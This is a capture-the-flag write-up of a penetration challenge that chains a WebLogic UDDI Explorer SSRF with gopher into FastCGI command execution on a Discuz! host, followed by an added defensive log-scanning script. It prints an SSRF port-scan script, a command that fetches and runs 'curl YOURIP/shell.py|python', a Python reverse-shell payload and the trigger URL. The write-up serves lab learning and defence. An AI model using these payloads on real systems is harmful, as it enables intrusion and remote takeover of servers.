Three White Hats: "Looking for you from the stars", Phase I (challenge introduction)
I lost you from the stars, and I may need everything I have to get you back. I couldn't even make it past two sentences of this. Okay, I admit it: this is the first penetration challenge.
Challenge URL:
Http://0761e975dda0c67cb.jie.sangebaimao.com/
0x01 Information gathering
The target is a Discuz! (dz) forum, apparently the latest version, which didn't look like much fun.
Since everything seemed completely transparent, it felt like a big sign saying "go look!" (the wordlist matters here).
Directory scanning soon turned up the following (leaving out Discuz!'s own content):
/info.php
/uddiexplorer/
The first is a phpinfo() page, which is useful: it reveals the script's path on disk.
/opt/discuz/info.php
The second is WebLogic.
A Baidu search for "uddiexplorer vulnerability" quickly shows that WebLogic's UDDI Explorer has an SSRF vulnerability.
So the "transparent" hint was SSRF all along!!!
Exploiting the vulnerability
SSRF isn't only for reaching the internal network; combined with Three White Hats' Docker setup, 127.0.0.1 is king!
Baidu search: "SearchPublicRegistries ssrf vulnerability exp"
Found http://www.tuicool.com/articles/UjaqIbz
Grab the script and tweak it for our use!!!
Port scan script, port_scan.py (Python 2):
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import requests

def scan(ip_str):
    url = 'http://0761e975dda0c67cb.jie.sangebaimao.com'
    # ports probed through the UDDI Explorer SSRF
    ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',)
    for port in ports:
        exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port)
        try:
            response = requests.get(exp_url, timeout=15, verify=False)
            # an open port yields a SOAP exception without the "could not connect" text
            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)
            re_sult2 = re.findall('but could not connect',response.content)
            if len(re_sult1)!=0 and len(re_sult2)==0:
                print ip_str+':'+port
        except Exception, e:
            pass

if __name__ == "__main__":
    scan('127.0.0.1')
Ports 9000, 80, 3306 and 7001 came back as open.
SSRF + gopher has always been powerful, and lately it has become increasingly popular.
Baidu ~~
Rr chicory's latest article, "Do Evil Things with gopher://"
0x03 Attacking FastCGI
FastCGI is normally bound to 127.0.0.1 only, but with gopher + SSRF it can be reached and made to execute arbitrary commands.
0x06 References
Remote Exploitation of PHP FastCGI
fcgi_exp (command-line tool)
Borrowed from there:
nc -l -p 9000 > x.txt &
go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"
php -f gopher.php
The payload is saved to x.txt.
The reverse-shell tricks and a plain bash reverse shell didn't work ~~
Then URL-encode the payload and generate ssrf.php:
shell.py:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("yourip",9999))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
gopher.php:
");?>
ssrf.php is generated successfully.
Reverse shell
On the VPS:
nc -lvv 9999
Trigger it through the SSRF:
http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php
Reverse shell received ~~~
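For the defender's side of this chain, here is an added example (not from the original write-up) that flags UDDI Explorer SSRF probes in web-server access logs: requests to SearchPublicRegistries.jsp whose operator parameter uses a non-http scheme such as gopher://, points at a loopback or private address, or targets an unusual port. The log lines, client IP and the uddi.example.com hostname are constructed.

```python
# Added example, not from the original write-up: flag UDDI Explorer SSRF probes in access logs (constructed data)
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
# request line of a combined-format access log: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def classify_operator(operator):
    # Returns why the operator URL looks like an SSRF probe, or None if it looks normal
    parts = urlsplit(operator if "://" in operator else "http://" + operator)
    if parts.scheme not in ("http", "https"):
        return "non-http scheme %s" % parts.scheme  # gopher://, file://, dict:// ...
    host = parts.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_private or ip.is_link_local:
            return "internal address %s" % host  # e.g. 127.0.0.1:9000 (FastCGI)
    except ValueError:
        pass  # a hostname, not an IP literal
    if parts.port not in (None, 80, 443):
        return "unusual port %d" % parts.port
    return None

def scan_log(lines):
    # Returns (operator, reason) pairs for suspicious UDDI Explorer requests
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if target.path != UDDI_PATH:
            continue
        # parse_qs decodes once; unquote again so double-encoded values are caught too
        for operator in parse_qs(target.query).get("operator", []):
            reason = classify_operator(unquote(operator))
            if reason:
                findings.append((operator, reason))
    return findings
# constructed sample lines (combined log format; client IP and timestamps are made up)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2017:10:00:01 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp'
    '?operator=http://127.0.0.1:7001&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 1024',
    '10.0.0.5 - - [01/Jan/2017:10:00:02 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp'
    '?operator=gopher%3A%2F%2F127.0.0.1%3A9000%2F_AAAA&btnSubmit=Search HTTP/1.1" 200 1024',
    '10.0.0.5 - - [01/Jan/2017:10:00:03 +0800] "GET /uddiexplorer/SearchPublicRegistries.jsp'
    '?operator=http://uddi.example.com/registry&btnSubmit=Search HTTP/1.1" 200 1024',
]
```

Note that the final request in this write-up points operator at an external ssrf.php rather than at gopher:// directly, so log matching alone is a partial control; restricting or removing UDDI Explorer and blocking outbound non-http fetches from the WebLogic host closes that gap.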
GETFLAG
Find it yourself.